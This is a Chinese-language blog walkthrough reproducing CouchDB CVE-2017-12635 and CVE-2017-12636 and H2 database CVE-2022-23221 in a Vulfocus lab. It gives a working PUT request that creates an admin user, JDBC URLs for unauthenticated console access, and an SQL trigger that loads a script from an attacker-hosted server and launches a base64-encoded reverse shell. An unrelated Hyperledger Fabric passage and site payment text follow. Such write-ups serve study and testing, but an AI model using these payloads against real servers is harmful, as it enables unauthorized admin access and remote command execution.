Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)

Couchdb-权限绕过–命令执行–(CVE-2017-12635)&&(CVE-2017-12636)–H2database命令执行–(CVE-2022-23221)

环境概述

采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败

Couchdb CVE-2017-12635权限绕过

漏洞概述

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露利用。

默认端口

5984端口

影响范围

小于 1.7.0 以及 小于 2.1.1

漏洞复现

将Vulfocus靶场环境启动后,根据映射端口号进行访问
在这里插入图片描述
访问成功后显示出版本号
在这里插入图片描述
访问登录界面抓包进行测试
访问地址

/_utils/#login

在这里插入图片描述
抓包将请求方法修改为PUT方法,在请求数据包后面添加json数据
POC

PUT /_users/org.couchdb.user:hack HTTP/1.1
Host: IP地址加端口
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "hack",
  "roles": ["_admin"],
  "roles": [],
  "password": "hack"
}

对应位置修改想要创建的用户及密码即可
在这里插入图片描述
使用创建的用户名和密码尝试登录,成功登录即漏洞利用成功

Couchdb CVE-2017-12636 命令执行

默认端口

5984端口

影响范围

小于 1.7.0 以及 小于 2.1.1

漏洞利用

这个漏洞利用需要建立在具有用户权限之上,可以利用CVE-2017-12635漏洞添加数据库用户后进行命令执行

环境启动后直接下载EXP,修改EXP的目标地址的端口号以及目标数据库版本即可
下载地址参考 CVE-2017-12636/exp.py
将EXP中所执行的命令目标以及数据库版本修改即可
在这里插入图片描述

H2database CVE-2022-23221 命令执行

漏洞概述

Java SQL 数据库 H2,H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。

影响范围

Spring Boot + H2

spring.h2.console.enabled=true

JDK < 6u201、7u191、8u182、11.0.1(LDAP)

默认端口

20051端口

漏洞利用

环境启动后访问得到如下界面
在这里插入图片描述

  1. 未授权进入:
  • 将如下命令放入JDBC URL即可直接进入数据库
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\
  1. 命令执行
  • 首先创建sql文件,将sql文件放入服务器中,这里我使用python启用web服务,将sql文件放入家目录中
CREATE TABLE test (
     id INT NOT NULL
 );
CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
  • 启用web服务
python3 -m http.server 端口
  • 使目标数据库加载远程sql文件
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\

以上内容仅作学习记录,如有错误或瑕疵,欢迎批评指正,感谢阅读。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
由于 Hyperledger-Fabric 是一个底层的区块链框架,它的系统架构比较复杂,包括了多个组件和模块。下面是一个简化的 Hyperledger-Fabric 系统架构图: ![Hyperledger-Fabric 系统架构图](https://i.imgur.com/A8I6NuL.png) 从图中可以看出,Hyperledger-Fabric 的系统架构主要包括以下组件和模块: - 客户端(Client):客户端是区块链系统的使用者,可以通过 SDK 与区块链网络进行交互,包括提交交易、查询数据等操作。客户端可以是 Web 应用程序、移动应用程序、IoT 设备等。 - 区块链网络(Blockchain Network):区块链网络由多个 Peer 和一个 Ordering Service 组成,每个 Peer 都有自己的账本,用于保存区块链上的交易记录和状态数据。 - Peer 节点(Peer Node):Peer 节点是区块链网络的核心,它可以执行智能合约、验证交易,并将交易记录和状态数据保存到自己的账本中。Peer 节点之间可以相互通信和交互数据,还可以进行背书(Endorsement)操作,即对交易进行签名,用于确保交易的真实性和合法性。 - Ordering Service 节点(Ordering Service Node):Ordering Service 节点是区块链网络的一部分,负责将交易打包成区块,并将区块传播到所有的 Peer 节点。Ordering Service 节点可以使用不同的共识算法来处理交易,例如 Kafka、Raft 等。 - 智能合约(Smart Contract):智能合约是 Hyperledger-Fabric 的核心概念,它是一段可编程的代码,用于对交易进行处理和执行。智能合约可以使用不同的编程语言编写,例如 Go、Java、JavaScript 等。 - 认证和授权服务(Authentication and Authorization Service):认证和授权服务是用于验证客户端和 Peer 节点身份的服务,它可以使用不同的身份验证协议和技术,例如 TLS、PKI 等。 - 数据库(Database):Hyperledger-Fabric 使用不同的数据库系统来保存交易记录和状态数据,例如 LevelDB、CouchDB 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值